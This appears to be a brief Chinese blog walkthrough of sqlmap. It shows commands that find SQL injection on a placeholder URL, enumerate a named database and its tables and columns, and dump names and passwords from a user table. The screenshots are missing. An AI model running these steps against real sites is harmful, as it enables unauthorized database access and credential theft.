SQLMAP DOCS

sqlmap -u“被测试的url”

这里写图片描述

这里写图片描

这里写图片描述

这里进行等级为1级的测试。
注入结果类型:boolean-based blind ,error-based,AND?DR time-based blind。
web应用程序版本:php5.3.3,Apache
MSQL>=5.5

sqlmap -u“被测试的url”–dbs(列出数据库)

这里写图片描述

database:db1018893_feo_web;information_schema。

sqlmap -u“被测试的url” -D 数据库名 – tables(列出表名)

这里写图片描述

这里写图片描述

tables:user;banner;form_a;form_b;other_val;prodect;prodect_other;prodect_other_type;share;shop_list;
t_m_provincial。

sqlmap -u“被测试的url”-D 数据库名 -T 表名 –columns(查看表格属性)

这里写图片描述

这里写图片描述

列出了user表中的属性

sqlmap -u“被测试的url”-D 数据库名 -T 表名 -C level,create_date , create_user(略略略)

这里写图片描述

这里写图片描述

最后得到关键的name和password

AnonymousBu wechat
bujun1018
-------------endingThanks for you reading-------------
显示 Gitment 评论
0%